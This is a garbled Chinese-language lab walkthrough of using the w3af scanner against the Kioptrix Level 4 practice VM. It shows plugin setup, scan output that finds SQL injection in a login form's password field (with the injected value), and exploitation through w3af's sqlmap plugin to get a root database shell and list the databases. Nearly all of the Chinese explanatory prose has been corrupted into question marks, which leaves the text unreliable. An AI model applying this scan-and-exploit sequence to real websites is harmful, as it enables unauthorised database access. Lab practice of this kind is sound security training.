????w3af?????Web??ó????????????.??????????130??????????а????????????棬SQL???(SQL Injection)?????(XSS)?????????????(LFI)????????????(RFI)??.?????????????????????????????????Web??e??????????????????ú????.
????0×00 ????
??????BackTrack5R3?????w3af????Kioptrix Level 4??SQL??????.
????0×01 ???
????w3af?????Web??ó???????????.??????????130??????????а????????????棬SQL???(SQL Injection)?????(XSS)?????????????(LFI)????????????(RFI)??.?????????????????????????????????Web??e??????????????????ú????.
????0×02 ???
????root@bt:~# apt-get install w3af
????0×03 ???
????root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console
????0×04 ??????????
????w3af>>> plugins//?????????w3af/plugins>>> list discovery //?г???????????????w3af/plugins>>> discovery findBackdoor phpinfo webSpider //????findBackdoor phpinfo webSpider?????????w3af/plugins>>> list audit //?г????????????????w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //????blindSqli fileUpload osCommanding sqli xss????????w3af/plugins>>> back//?????????w3af>>> target//???????????????w3af/config:target>>>set target http://192.168.244.132///??????????http://192.168.244.132/w3af/config:target>>> back//?????????
????0×05 ??????
w3af>>> start
---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername=""?? mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php"?? using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application?? the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application?? the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php"?? using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//??????
????0×06 ???????????
????w3af>>> exploit //??????????????w3af/exploit>>> list exploit//?г???????????????????w3af/exploit>>> exploit sqlmap //???sqlmap????SQL???????????
---Trying to exploit using vulnerability with id: [1010?? 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] <sqlobject ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>Please use the interact command to interact with the shell objects.---//???????SQL??????//????????shell objects(??????0)???????????0x07 ???????w3af/exploit>>> interact 0//interact + shell object??????????---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0>>> ---//sqlmap?????????????w3af/exploit/sqlmap-0>>> dbs   ---Available databases:  [3]:[*] information_schema[*] members[*] mysql---//??????????????